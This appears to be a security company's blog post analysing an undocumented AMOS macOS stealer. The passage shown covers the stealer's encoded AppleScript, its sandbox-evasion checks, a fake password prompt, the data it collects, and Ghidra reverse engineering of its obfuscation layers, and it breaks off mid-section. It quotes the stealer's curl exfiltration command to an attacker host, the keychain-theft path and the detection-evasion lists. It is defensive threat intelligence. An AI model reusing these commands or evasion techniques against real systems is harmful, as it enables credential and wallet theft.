[{"data":1,"prerenderedAt":26239},["ShallowReactive",2],{"post-en-/posts/2026-04-10-incident-to-intelligence":3,"authors_data":2275,"content-en-posts-d887737123081":2614},{"id":4,"title":5,"author":6,"body":8,"cta":2166,"description":14,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2170,"moment":2174,"navigation":2181,"path":2265,"seo":2266,"stem":2267,"tags":2268,"webcast":2168,"__hash__":2274},"content_en/posts/2026-04-10-incident-to-intelligence.md","Anatomy of an Unknown AMOS Stealer: From Alert to Immunity in Hours",[7],"Pascal Asch",{"type":9,"value":10,"toc":2130},"minimal",[11,15,18,21,24,29,32,35,38,40,45,48,51,66,69,72,80,83,87,89,92,115,118,126,129,137,144,148,150,153,161,176,180,182,185,190,193,201,205,207,215,219,221,224,228,230,233,241,245,247,255,258,356,359,389,391,395,397,404,407,411,413,497,501,503,514,521,595,606,613,617,619,684,688,690,697,699,703,705,712,738,928,931,939,950,953,961,975,988,990,994,996,1014,1036,1225,1228,1236,1239,1242,1244,1248,1250,1253,1332,1335,1354,1433,1436,1438,1442,1444,1447,1454,1509,1512,1520,1523,1525,1529,1531,1538,1551,1599,1610,1649,1658,1673,1676,1678,1682,1684,1691,1694,1702,1705,1713,1727,1730,1732,1736,1738,1748,1752,1754,1773,1781,1795,1815,1819,1821,1824,1832,1835,1843,1857,1861,1863,1866,1874,1893,1899,1903,1905,1913,1919,1926,1930,1932,1940,1944,1946,1949,1957,1960,1964,1966,1974,1978,1980,1988,1992,1994,2002,2006,2008,2016,2037,2042,2044,2048,2050,2057,2074,2077,2090,2092,2096,2098,2101,2104,2107,2109,2126],[12,13,14],"p",{},"When an alert fires in our SOC, the clock starts. But not just for the affected customer, for every customer we protect. In the modern threat landscape, the most dangerous moment for any organization is the intelligence gap: that window of time between a new malware variant being deployed and the rest of the world finding out it exists.",[12,16,17],{},"For a standalone security team, this gap is a period of extreme vulnerability. You are essentially waiting for a vendor update or a public signature feed that hasn't been written yet. But for our customers, that gap is closed by the power of our inhouse developed Shared Threat Intelligence.",[12,19,20],{},"This blogpost is the technical breakdown of how we dismantled a previously undocumented AMOS (Atomic macOS Stealer) variant. It's a story of moving from a single compromised endpoint to rapid deployment of detection and blocking capabilities across customer environments.",[22,23],"hr",{},[25,26,28],"h1",{"id":27},"the-incident-a-unknown-ioc-scenario","The Incident: A unknown IOC Scenario",[12,30,31],{},"{: .h3-font-size}",[12,33,34],{},"The alert arrived on March 12, 2026 at 06:25 local time. A macOS endpoint had been compromised. By the time our SOC began analysing the artefacts, we were looking at a situation every threat analyst dreads: No known file hashes, C2 IP addresses, or meaningful behavioral signatures existed in public databases at the time of detection.",[12,36,37],{},"The full architecture of the attack only became clear during the subsequent deep-dive analysis. We discovered that the infection relied on a 15.7 MB macOS Universal Binary (x86_64 and ARM64) dropped at /private/tmp/helper. This sample was not readily available on the system; our team had to reconstruct the infection chain and simulate the original delivery request to manually retrieve the binary from the attacker's infrastructure.",[22,39],{},[41,42,44],"h2",{"id":43},"stage-1-sandbox-checks","Stage 1: Sandbox checks",[12,46,47],{},"{: .h4-font-size}",[12,49,50],{},"Before the malicious stealer itself was executed on the machine, an Apple Script payload had already executed. Every string in it, every file path, every shell command, every URL, was encoded using three custom arithmetic functions:",[52,53,55],"div",{"style":54},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[56,57,62],"pre",{"className":58,"code":60,"language":61},[59],"language-text","on ipbgcjzgqa(a, b)\n    -- result[i] = chr(a[i] - b[i])\n    \non kwcvvjininv(a, b)\n    -- result[i] = chr(a[i] + b[i])\n    \non xqylheckjx(a, b, offset)\n    -- result[i] = chr(a[i] - b[i] - offset)\n","text",[63,64,60],"code",{"__ignoreMap":65},"",[12,67,68],{},"None of the strings appear anywhere in plaintext. What looked like meaningless integer arrays at first glance decoded, once we had reversed the encoding scheme, to a complete, fully operational data theft and exfiltration framework.",[12,70,71],{},"We decoded every array in the script statically. The results were unambiguous:",[52,73,74],{"style":54},[56,75,78],{"className":76,"code":77,"language":61},[59],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[63,79,77],{"__ignoreMap":65},[12,81,82],{},"The download URL was deliberately crafted to impersonate a legitimate n8n workflow automation update, a tool commonly used by developers and DevOps engineers. This is not a random choice. It signals a targeted campaign aimed at technically sophisticated users, not generic end users who might install cracked software.",[41,84,86],{"id":85},"the-anti-sandbox-check","The Anti-Sandbox Check",[12,88,47],{},[12,90,91],{},"Before any download occurred, the script ran a dedicated VM and sandbox detection routine. We also recovered a standalone anti-sandbox script from the incident artefacts:",[52,93,94],{"style":54},[56,95,99],{"className":96,"code":97,"language":98,"meta":65,"style":65},"language-applescript shiki shiki-themes github-light github-dark","set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[63,100,101,109],{"__ignoreMap":65},[102,103,106],"span",{"class":104,"line":105},"line",1,[102,107,108],{},"set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\n",[102,110,112],{"class":104,"line":111},2,[102,113,114],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[12,116,117],{},"The results were then checked against two lists. The first checked for virtualisation markers in memory data:",[52,119,120],{"style":54},[56,121,124],{"className":122,"code":123,"language":61},[59],"\"QEMU\"   \"VMware\"   \"KVM\"\n",[63,125,123],{"__ignoreMap":65},[12,127,128],{},"The second checked hardware identifiers against a set of known analysis machine serial numbers:",[52,130,131],{"style":54},[56,132,135],{"className":133,"code":134,"language":61},[59],"\"Z31FHXYQ0J\"     -- known sandbox machine serial\n\"C07T508TG1J2\"   -- known sandbox machine serial  \n\"C02TM2ZBHX87\"   -- known sandbox machine serial\n\"Chip: Unknown\"  -- emulation indicator\n\"Intel Core 2\"   -- legacy/VM indicator\n",[63,136,134],{"__ignoreMap":65},[12,138,139,140,143],{},"If any match was found: ",[63,141,142],{},"exit 100",", complete termination. On a real MacBook Pro with an Apple Silicon chip, all checks pass silently and execution continues. This is a professional-grade sandbox evasion technique, and it was running before a single byte of the binary had been downloaded.",[41,145,147],{"id":146},"simple-but-effective-privilege-escalation-the-fake-password-dialog","Simple but effective privilege escalation: The fake password dialog",[12,149,47],{},[12,151,152],{},"The decoded script also contained the text used for privilege escalation via social engineering:",[52,154,155],{"style":54},[56,156,159],{"className":157,"code":158,"language":61},[59],"Title:   \"Application wants to install helper\"\nPrompt:  \"Required Application Helper. Please enter device\n          password to continue.\"\nButton:  \"Continue\"\n",[63,160,158],{"__ignoreMap":65},[12,162,163,164,167,168,171,172,175],{},"This dialog is displayed using a standard macOS ",[63,165,166],{},"display dialog"," call with ",[63,169,170],{},"with hidden answer",", visually indistinguishable from a legitimate macOS authorisation prompt. The entered password was used to invoke ",[63,173,174],{},"login -pf \u003Cusername>",", elevating the process to root before the binary was ever executed.",[41,177,179],{"id":178},"what-the-script-collected","What the Script Collected",[12,181,47],{},[12,183,184],{},"Once the binary had run, the osascript continued its own collection workflow, targeting every category of sensitive data on the system. We decoded all collection paths and targets:",[186,187,189],"h3",{"id":188},"browser-data-all-chromium-browsers-safari","Browser data (all Chromium browsers + Safari):",[12,191,192],{},"{: .font-size-4}",[52,194,195],{"style":54},[56,196,199],{"className":197,"code":198,"language":61},[59],"/Login Data          /Cookies            /Web Data\n/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/\n",[63,200,198],{"__ignoreMap":65},[186,202,204],{"id":203},"macos-keychain","macOS Keychain:",[12,206,192],{},[52,208,209],{"style":54},[56,210,213],{"className":211,"code":212,"language":61},[59],"~/Library/Keychains/login.keychain-db  -- accessed directly via cat\n",[63,214,212],{"__ignoreMap":65},[186,216,218],{"id":217},"apple-notes","Apple Notes",[12,220,192],{},[12,222,223],{},"Complete content exported as HTML with count header",[186,225,227],{"id":226},"local-files","Local files",[12,229,192],{},[12,231,232],{},"Desktop and Documents, up to 30 MB, targeting:",[52,234,235],{"style":54},[56,236,239],{"className":237,"code":238,"language":61},[59],"pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf\nkey  p12  pem  cert  pfx  sql  db  sqlite\njson  xml  yaml  conf  env  csv\n",[63,240,238],{"__ignoreMap":65},[186,242,244],{"id":243},"cryptocurrency-wallets","Cryptocurrency wallets",[12,246,192],{},[12,248,249,250,254],{},"A hardcoded list of ",[251,252,253],"strong",{},"200+ browser extension IDs"," targeting every major wallet including MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI, and Exodus.",[12,256,257],{},"After collection, everything was staged in a randomly-named temporary directory and sent:",[52,259,260],{"style":54},[56,261,265],{"className":262,"code":263,"language":264,"meta":65,"style":65},"language-bash shiki shiki-themes github-light github-dark","ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n  -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n  -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n","bash",[63,266,267,301,327,344],{"__ignoreMap":65},[102,268,269,273,277,280,283,287,291,295,298],{"class":104,"line":105},[102,270,272],{"class":271},"sScJk","ditto",[102,274,276],{"class":275},"sj4cs"," -c",[102,278,279],{"class":275}," -k",[102,281,282],{"class":275}," --sequesterRsrc",[102,284,286],{"class":285},"szBVR"," \u003C",[102,288,290],{"class":289},"sZZnC","staging_di",[102,292,294],{"class":293},"sVt8B","r",[102,296,297],{"class":285},">",[102,299,300],{"class":289}," /tmp/out.zip\n",[102,302,303,306,309,312,315,318,321,324],{"class":104,"line":111},[102,304,305],{"class":271},"curl",[102,307,308],{"class":275}," --connect-timeout",[102,310,311],{"class":275}," 120",[102,313,314],{"class":275}," --max-time",[102,316,317],{"class":275}," 300",[102,319,320],{"class":275}," -X",[102,322,323],{"class":289}," POST",[102,325,326],{"class":275}," \\\n",[102,328,330,333,336,339,342],{"class":104,"line":329},3,[102,331,332],{"class":275},"  -H",[102,334,335],{"class":289}," \"user: \u003Cuuid>\"",[102,337,338],{"class":275}," -H",[102,340,341],{"class":289}," \"BuildID: \u003Chw_profile>\"",[102,343,326],{"class":275},[102,345,347,350,353],{"class":104,"line":346},4,[102,348,349],{"class":275},"  -F",[102,351,352],{"class":289}," \"file=@/tmp/out.zip\"",[102,354,355],{"class":289}," laislivon[.]com/contact\n",[12,357,358],{},"Cleanup followed immediately:",[52,360,361],{"style":54},[56,362,364],{"className":262,"code":363,"language":264,"meta":65,"style":65},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[63,365,366,383],{"__ignoreMap":65},[102,367,368,371,374,376,378,380],{"class":104,"line":105},[102,369,370],{"class":271},"rm",[102,372,373],{"class":275}," -r",[102,375,286],{"class":285},[102,377,290],{"class":289},[102,379,294],{"class":293},[102,381,382],{"class":285},">\n",[102,384,385,387],{"class":104,"line":111},[102,386,370],{"class":271},[102,388,300],{"class":289},[22,390],{},[25,392,394],{"id":393},"stage-2-reverse-engineering-the-helper-binary","Stage 2: Reverse Engineering the 'helper' Binary",[12,396,31],{},[12,398,399,400,403],{},"The ",[63,401,402],{},"helper"," binary is where this analysis gets deep. This is a purpose-built, professionally obfuscated macOS executable designed to be as difficult as possible to analyse statically, and it is the part of this investigation that required the most significant reverse engineering effort.",[12,405,406],{},"All analysis was performed using Ghidra with our custom ARM64 analysis workflow.",[41,408,410],{"id":409},"file-properties","File Properties",[12,412,47],{},[52,414,416],{"style":415},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[417,418,420,421,420,437],"table",{"style":419},"width:100%; border-collapse: collapse; font-size: 0.85rem","\n  ",[422,423,424,425,420],"thead",{},"\n    ",[426,427,428,429,428,434,424],"tr",{},"\n      ",[430,431,433],"th",{"style":432},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Property",[430,435,436],{"style":432},"Value",[438,439,424,440,424,450,424,459,424,467,424,477,424,487,420],"tbody",{},[426,441,428,442,428,447,424],{},[443,444,446],"td",{"style":445},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Format",[443,448,449],{"style":445},"Mach-O Universal Binary",[426,451,428,452,428,456,424],{},[443,453,455],{"style":454},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Architectures",[443,457,458],{"style":454},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[426,460,428,461,428,464,424],{},[443,462,463],{"style":445},"Size",[443,465,466],{"style":445},"15.7 MB",[426,468,428,469,428,472,424],{},[443,470,471],{"style":454},"MD5",[443,473,474],{"style":454},[63,475,476],{},"4599fdf2fa2099b30d8bbf76703dd634",[426,478,428,479,428,482,424],{},[443,480,481],{"style":445},"SHA-1",[443,483,484],{"style":445},[63,485,486],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[426,488,428,489,428,492,424],{},[443,490,491],{"style":454},"SHA-256",[443,493,494],{"style":454},[63,495,496],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[41,498,500],{"id":499},"it-starts-before-main","It Starts Before main()",[12,502,47],{},[12,504,505,506,509,510,513],{},"The first thing we confirmed in Ghidra was that this binary does not behave like a normal executable. The real entry point is not ",[63,507,508],{},"main()",". It is a function registered in ",[63,511,512],{},"__mod_init_func",", a macOS mechanism that instructs the dynamic linker (dyld) to execute designated functions automatically when the binary is loaded, before any user-visible code runs.",[12,515,516,517,520],{},"The init function at ",[63,518,519],{},"0x10009f384"," is the true entry point of the malware. We decompiled the output with Ghidra:",[52,522,523],{"style":54},[524,525,526,530,533,536,540,541,545,546,548,549,552,553,567],"code-block",{},[102,527,529],{"style":528},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[531,532],"br",{},[102,534,535],{"style":528},"// __mod_init_func registered — executes before main()",[102,537,539],{"style":538},"color:#d73a49","void"," ",[102,542,544],{"style":543},"color:#6f42c1","FUN_10009f384","(",[102,547,539],{"style":538},")\n{\n  ",[102,550,551],{"style":538},"int"," iVar1;\n",[12,554,555,558,559,545,562,566],{},[102,556,557],{"style":528},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[102,560,561],{"style":543},"_usleep",[102,563,565],{"style":564},"color:#005cc5","0x37e",");",[12,568,569,572,575,576,578,579,582,583,586,587,590,591,594],{},[102,570,571],{"style":528},"// Indirect jump table — 14-state machine",[102,573,574],{"style":528},"// Defeats CFG reconstruction in static analysis tools","\n(*(",[102,577,63],{"style":538}," *)((",[102,580,581],{"style":538},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[102,584,585],{"style":564},"4","\n+ ",[102,588,589],{"style":564},"0x10009f440","))(iVar1);\n",[102,592,593],{"style":538},"return",";\n}",[12,596,597,598,601,602,605],{},"Two things are immediately notable. First, the 894-microsecond ",[63,599,600],{},"usleep"," at startup, an anti-sandbox timing signal. Second, and more significantly, the indirect jump table at ",[63,603,604],{},"0x10009f43c",". This is a computed branch where the target address is calculated at runtime from a lookup table. Static analysis tools cannot reconstruct the control flow graph from this, Ghidra itself logs multiple \"unreachable block\" warnings as it tries and fails to trace the execution path. This is deliberate.",[12,607,608,609,612],{},"The jump table drives a ",[251,610,611],{},"14-state execution machine",". Each state performs one discrete step of the decryption and execution pipeline. The state counter is updated after each step, and the machine loops until all states have executed.",[41,614,616],{"id":615},"the-arm64-disassembly-of-the-state-dispatcher","The ARM64 Disassembly of the State Dispatcher",[12,618,47],{},[52,620,621],{"style":54},[56,622,626],{"className":623,"code":624,"language":625,"meta":65,"style":65},"language-asm shiki shiki-themes github-light github-dark","10009f3fc:  stp xzr,xzr,[sp, #0x48]\n10009f41c:  mov w0,#0x37e\n10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n10009f428:  b.hi 0x10009fd44         ; exit if done\n10009f42c:  mov w8,w25               ; current state index\n10009f430:  adr x9,0x10009f440       ; base of jump table\n10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n10009f43c:  br x9                    ; indirect branch, CFG broken here\n","asm",[63,627,628,633,638,643,648,654,660,666,672,678],{"__ignoreMap":65},[102,629,630],{"class":104,"line":105},[102,631,632],{},"10009f3fc:  stp xzr,xzr,[sp, #0x48]\n",[102,634,635],{"class":104,"line":111},[102,636,637],{},"10009f41c:  mov w0,#0x37e\n",[102,639,640],{"class":104,"line":329},[102,641,642],{},"10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n",[102,644,645],{"class":104,"line":346},[102,646,647],{},"10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n",[102,649,651],{"class":104,"line":650},5,[102,652,653],{},"10009f428:  b.hi 0x10009fd44         ; exit if done\n",[102,655,657],{"class":104,"line":656},6,[102,658,659],{},"10009f42c:  mov w8,w25               ; current state index\n",[102,661,663],{"class":104,"line":662},7,[102,664,665],{},"10009f430:  adr x9,0x10009f440       ; base of jump table\n",[102,667,669],{"class":104,"line":668},8,[102,670,671],{},"10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[102,673,675],{"class":104,"line":674},9,[102,676,677],{},"10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n",[102,679,681],{"class":104,"line":680},10,[102,682,683],{},"10009f43c:  br x9                    ; indirect branch, CFG broken here\n",[41,685,687],{"id":686},"six-obfuscation-layers-stacked","Six Obfuscation Layers, Stacked",[12,689,47],{},[12,691,692,693,696],{},"The binary uses six distinct obfuscation layers, stacked and chained so that the output of each feeds the next. Every payload, every string, every internal constant is encoded. Nothing meaningful appears in plaintext anywhere in the ",[63,694,695],{},"__const"," segment. What follows is a complete layer-by-layer breakdown, verified directly in Ghidra, down to the individual ARM64 instructions. While each individual technique used in this binary is known in isolation, their chained application across multiple stages created a highly interdependent execution flow that significantly increased the complexity of static and dynamic analysis.",[22,698],{},[186,700,702],{"id":701},"layer-1-compile-time-triplet-encoding","Layer 1 — Compile-Time Triplet Encoding",[12,704,192],{},[12,706,707,708,711],{},"Every string in the binary is stored not as characters, but as a sequence of 12-byte arithmetic triplets. Each triplet ",[63,709,710],{},"(a, b, shift)"," encodes exactly one output character. The encoding scheme is applied at compile time — meaning no string ever exists as plaintext in the binary, not even transiently during loading.",[12,713,714,715,718,719,722,723,726,727,718,730,733,734,737],{},"Two separate decoder functions handle different string sizes. ",[63,716,717],{},"FUN_100087c08"," at ",[63,720,721],{},"0x100087c08"," decodes 60-character strings (720 bytes of input data from ",[63,724,725],{},"DAT_1006292cc","). ",[63,728,729],{},"FUN_10007ad80",[63,731,732],{},"0x10007ad80"," decodes 56-character strings (672 bytes from ",[63,735,736],{},"DAT_10049708c","). Both use the identical algorithm.",[52,739,740],{"style":54},[524,741,742,745,747,750,540,752,545,754,757,758,760,761,763,764,766,767,770,771],{},[102,743,744],{"style":528},"// FUN_100087c08 @ 0x100087c08",[531,746],{},[102,748,749],{"style":528},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[102,751,539],{"style":538},[102,753,717],{"style":543},[102,755,756],{"style":538},"long"," *param_1)\n{\n  ",[102,759,756],{"style":538}," *plVar1;\n  ",[102,762,539],{"style":538}," *pvVar2;\n  ",[102,765,756],{"style":538}," lVar3;\n  ",[102,768,769],{"style":538},"uint"," *puVar4;\n",[12,772,773,774,545,777,780,781,786,789,790,792,793,796,798,801,802,805,806,809,810,813,814,816,817,578,819,821,822,825,826,829,830,832,833,836,837,840,841,578,844,846,847,850,851,854,856,859,860,578,862,864,865,867,868,870,871,876,877,880,881,886,887,890,891,893,894,899,900,902,903,905,906,909,910,913,914,916,917,920,922,925,926,594],{},"pvVar2 = ",[102,775,776],{"style":543},"operator_new",[102,778,779],{"style":564},"0x2d0",");           ",[102,782,783,784],{"style":528},"// allocate 720 bytes (60 triplets × 12)",[531,785],{},[102,787,788],{"style":543},"_memcpy","(pvVar2, &DAT_1006292cc, ",[102,791,779],{"style":564},"); ",[102,794,795],{"style":528},"// copy encoded triplets from __const",[531,797],{},[102,799,800],{"style":543},"FUN_1000a0840","(param_1, ",[102,803,804],{"style":564},"0x3c",", ",[102,807,808],{"style":564},"0",");        ",[102,811,812],{"style":528},"// init 60-char output buffer","\nlVar3 = ",[102,815,808],{"style":564},";\npuVar4 = (",[102,818,769],{"style":538},[102,820,756],{"style":538},")pvVar2 + ",[102,823,824],{"style":564},"8",");\n",[102,827,828],{"style":538},"do"," {\nplVar1 = (",[102,831,756],{"style":538}," *)*param_1;\n",[102,834,835],{"style":538},"if"," (-",[102,838,839],{"style":564},"1"," \u003C *(",[102,842,843],{"style":538},"char",[102,845,756],{"style":538},")param_1 + ",[102,848,849],{"style":564},"0x17",")) {\nplVar1 = param_1;\n}\n",[102,852,853],{"style":528},"// THE DECODE FORMULA, one character per triplet:",[531,855],{},[102,857,858],{"style":528},"// char = ((b * 3) XOR a) >> shift) - b","\n*(",[102,861,843],{"style":538},[102,863,756],{"style":538},")plVar1 + lVar3) =\n(",[102,866,843],{"style":538},")((",[102,869,551],{"style":538},")(puVar4",[102,872,873,874],{},"-",[102,875,839],{"style":564}," * ",[102,878,879],{"style":564},"3"," ^ puVar4",[102,882,873,883],{},[102,884,885],{"style":564},"2",") >> (*puVar4 & ",[102,888,889],{"style":564},"0x1f","))\n- (",[102,892,843],{"style":538},")puVar4",[102,895,896],{},[102,897,898],{"style":564},"-1",";\nlVar3 = lVar3 + ",[102,901,839],{"style":564},";\npuVar4 = puVar4 + ",[102,904,879],{"style":564},";       ",[102,907,908],{"style":528},"// advance 12 bytes — next triplet","\n} ",[102,911,912],{"style":538},"while"," (lVar3 != ",[102,915,804],{"style":564},");     ",[102,918,919],{"style":528},"// loop exactly 60 times",[531,921],{},[102,923,924],{"style":543},"operator_delete","(pvVar2);\n",[102,927,593],{"style":538},[12,929,930],{},"And the corresponding ARM64 assembly, each instruction maps directly to one operation in the formula:",[52,932,933],{"style":54},[56,934,937],{"className":935,"code":936,"language":61},[59],"100087c48:  add x9,x20,#0x8\n100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11\n100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n                                       ; (compiler avoids MUL instruction)\n100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a\n100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12\n100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved\n100087c60:  sub w10,w10,w11           ; subtract b — final decoded character\n100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer\n100087c78:  add x8,x8,#0x1\n100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60\n100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded\n",[63,938,936],{"__ignoreMap":65},[12,940,941,942,945,946,949],{},"One detail worth noting: the multiplication ",[63,943,944],{},"b × 3"," is implemented as ",[63,947,948],{},"add w12, w11, w11, LSL #1",", a shift-and-add that avoids a multiplication instruction entirely. This is a classic compiler optimisation that also makes the code harder to pattern-match in signature databases.",[12,951,952],{},"The complete decode formula:",[52,954,955],{"style":54},[56,956,959],{"className":957,"code":958,"language":61},[59],"char = ASR( (b × 3) XOR a, shift ) − b\n",[63,960,958],{"__ignoreMap":65},[12,962,399,963,966,967,970,971,974],{},[63,964,965],{},"ASR"," (arithmetic shift right) is critical. It preserves the sign bit. If the intermediate result of ",[63,968,969],{},"(b×3) XOR a"," is negative, which it frequently is, a logical shift would produce a different result entirely. This is intentional, and means that simply reimplementing the formula with ",[63,972,973],{},">>"," in a higher-level language will silently produce wrong output unless the signed arithmetic is handled correctly.",[12,976,977,978,980,981,983,984,987],{},"The 56-character variant ",[63,979,729],{}," is structurally identical, operating on ",[63,982,736],{}," with a loop limit of ",[63,985,986],{},"0x38",". Both functions were confirmed live from Ghidra during this analysis.",[22,989],{},[186,991,993],{"id":992},"layer-2-hex-string-encoding","Layer 2 — Hex String Encoding",[12,995,192],{},[12,997,998,999,1002,1003,718,1006,1009,1010,1013],{},"The raw bytes produced by Layer 1 are themselves ASCII hex characters, not binary data. The output of a Layer 1 triplet decode is a string of hex pairs: ",[63,1000,1001],{},"32694e5462...",". This is confirmed by the decoder function ",[63,1004,1005],{},"FUN_100000dc0",[63,1007,1008],{},"0x100000dc0",", which implements a hex-decode using a lookup table at ",[63,1011,1012],{},"DAT_1007bb591",".",[12,1015,1016,1017,873,1020,805,1023,873,1026,805,1029,873,1032,1035],{},"The Ghidra decompile shows a switch statement mapping each hex character (",[63,1018,1019],{},"0x30",[63,1021,1022],{},"0x39",[63,1024,1025],{},"0x41",[63,1027,1028],{},"0x46",[63,1030,1031],{},"0x61",[63,1033,1034],{},"0x66",") to its nibble value, assembling output bytes two characters at a time:",[52,1037,1038],{"style":54},[524,1039,1040,1043,1046,1049,1050,578,1053,1055,1056,540,1059,1061,1062,1065,1066,420,1069,540,1071,1074,1075,1078,1079,1081,1082,420,1085,540,1087,1074,1090,1078,1093,1081,1095,420,1098,420,1101,540,1103,1061,1105,540,1107,1074,1109,1078,1112,1114,1115,420,1118,540,1120,1061,1123,540,1125,1074,1128,1078,1131,1114,1133,420,1136,540,1138,1061,1141,540,1143,1146,1147,1078,1150,1114,1152,420,1155,540,1157,1061,1160,540,1162,1165,1166,1078,1169,1114,1171,420,1174,540,1176,1061,1179,540,1181,1074,1184,1078,1187,1114,1189,420,1192,540,1194,1061,1196,540,1198,1074,1200,1078,1203,1114,1205,1208,1209,859,1212,578,1215,1217,1218,1220,1221,1224],{},[102,1041,1042],{"style":528},"// FUN_100000dc0 @ 0x100000dc0",[102,1044,1045],{"style":528},"// Hex decoder, processes input two characters per output byte",[102,1047,1048],{"style":538},"switch","(*(",[102,1051,1052],{"style":538},"undefined1",[102,1054,756],{"style":538},")plVar2 + lVar7)) {\n  ",[102,1057,1058],{"style":538},"case",[102,1060,1019],{"style":564},": ",[102,1063,1064],{"style":538},"break",";                  ",[102,1067,1068],{"style":528},"// '0' → 0x00",[102,1070,1058],{"style":538},[102,1072,1073],{"style":564},"0x31",": bVar9 = ",[102,1076,1077],{"style":564},"0x10","; ",[102,1080,1064],{"style":538},";   ",[102,1083,1084],{"style":528},"// '1' → 0x10",[102,1086,1058],{"style":538},[102,1088,1089],{"style":564},"0x32",[102,1091,1092],{"style":564},"0x20",[102,1094,1064],{"style":538},[102,1096,1097],{"style":528},"// '2' → 0x20",[102,1099,1100],{"style":528},"// ... '3' through '9' ...",[102,1102,1058],{"style":538},[102,1104,1025],{"style":564},[102,1106,1058],{"style":538},[102,1108,1031],{"style":564},[102,1110,1111],{"style":564},"0xa0",[102,1113,1064],{"style":538},";  ",[102,1116,1117],{"style":528},"// 'A'/'a' → 0xa0",[102,1119,1058],{"style":538},[102,1121,1122],{"style":564},"0x42",[102,1124,1058],{"style":538},[102,1126,1127],{"style":564},"0x62",[102,1129,1130],{"style":564},"0xb0",[102,1132,1064],{"style":538},[102,1134,1135],{"style":528},"// 'B'/'b' → 0xb0",[102,1137,1058],{"style":538},[102,1139,1140],{"style":564},"0x43",[102,1142,1058],{"style":538},[102,1144,1145],{"style":564},"99",":   bVar9 = ",[102,1148,1149],{"style":564},"0xc0",[102,1151,1064],{"style":538},[102,1153,1154],{"style":528},"// 'C'/'c' → 0xc0",[102,1156,1058],{"style":538},[102,1158,1159],{"style":564},"0x44",[102,1161,1058],{"style":538},[102,1163,1164],{"style":564},"100",":  bVar9 = ",[102,1167,1168],{"style":564},"0xd0",[102,1170,1064],{"style":538},[102,1172,1173],{"style":528},"// 'D'/'d' → 0xd0",[102,1175,1058],{"style":538},[102,1177,1178],{"style":564},"0x45",[102,1180,1058],{"style":538},[102,1182,1183],{"style":564},"0x65",[102,1185,1186],{"style":564},"0xe0",[102,1188,1064],{"style":538},[102,1190,1191],{"style":528},"// 'E'/'e' → 0xe0",[102,1193,1058],{"style":538},[102,1195,1028],{"style":564},[102,1197,1058],{"style":538},[102,1199,1034],{"style":564},[102,1201,1202],{"style":564},"0xf0",[102,1204,1064],{"style":538},[102,1206,1207],{"style":528},"// 'F'/'f' → 0xf0","\n}\n",[102,1210,1211],{"style":528},"// Second nibble from lookup table at DAT_1007bb591",[102,1213,1214],{"style":538},"byte",[102,1216,756],{"style":538},")pppppppuVar3 + uVar8) =\n    (&DAT_1007bb591)[(",[102,1219,581],{"style":538},")uVar4 & ",[102,1222,1223],{"style":564},"0xff","] | bVar9;\n",[12,1226,1227],{},"The ARM64 assembly drives this with a secondary computed-branch table, effectively implementing a 55-entry jump table for the switch:",[52,1229,1230],{"style":54},[56,1231,1234],{"className":1232,"code":1233,"language":61},[59],"100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table\n100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68:  br x17                   ; jump — second computed branch in 24 bytes\n",[63,1235,1233],{"__ignoreMap":65},[12,1237,1238],{},"Two computed branches within a 24-byte window. Static analysis tools struggle badly with this pattern because both targets are unknown at analysis time.",[12,1240,1241],{},"A 137,208-character hex string decodes to 68,604 bytes. These 68,604 bytes then feed Layer 3.",[22,1243],{},[186,1245,1247],{"id":1246},"layer-3-custom-16-symbol-nibble-alphabet","Layer 3 — Custom 16-Symbol Nibble 